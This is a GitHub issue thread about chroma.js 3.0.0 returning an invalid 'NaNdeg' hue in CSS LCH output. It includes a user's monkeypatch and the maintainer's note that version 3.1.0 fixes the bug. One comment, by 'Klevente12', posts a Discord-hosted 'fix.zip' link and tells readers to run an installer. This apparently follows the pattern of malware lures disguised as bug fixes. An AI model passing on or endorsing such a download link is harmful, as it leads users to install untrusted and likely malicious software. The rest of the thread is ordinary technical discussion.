### ISSUE TITLE
CSS output for LCH color spaces uses NaN, producing invalid color

### ISSUE THREAD

**Issue by haykam821** [gka/chroma.js#357]
Hey! With chroma.js 3.0.0, the `css` method seems to produce invalid values for certain colors:

```js
chroma('white').lch(); // [100,0,NaN]
chroma('white').css("lch"); // "lch(100% 0 NaNdeg)"
```

Tested in a browser, `lch(100% 0 NaNdeg)` is an invalid color value. I would expect the `css` method to always provide a valid color value, even if the color doesn't necessarily make sense in the given color space.

I believe this issue is not a duplicate of #322, as the `css` method previously took care when handling `NaN`, regardless of whether `hsl` included `NaN` in its output:

```js
chroma('white').hsl(); // [NaN,0,1,1]
chroma('white').css("hsl"); // "hsl(0deg 0% 100%)"
```

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by vinerz** [comment]
+1 on this issue. Having to use a few 0.003 to prevent a NaN, which obviously tints the color in an unwanted way

**Comment by vinerz** [comment]
I made a monkeypatch that gives me nausea, but it... works. At least my work can progress.

```js
import chroma, { Color } from "chroma-js";

Color.prototype.__css = Color.prototype.css;

Color.prototype.css = function cssPatch(format: string): string {
  return this.__css(format).replaceAll("NaN", "0");
};
```

**Comment by gka** [comment]
thanks for reporting this. I fixed the bug in the 3.1.0 release.
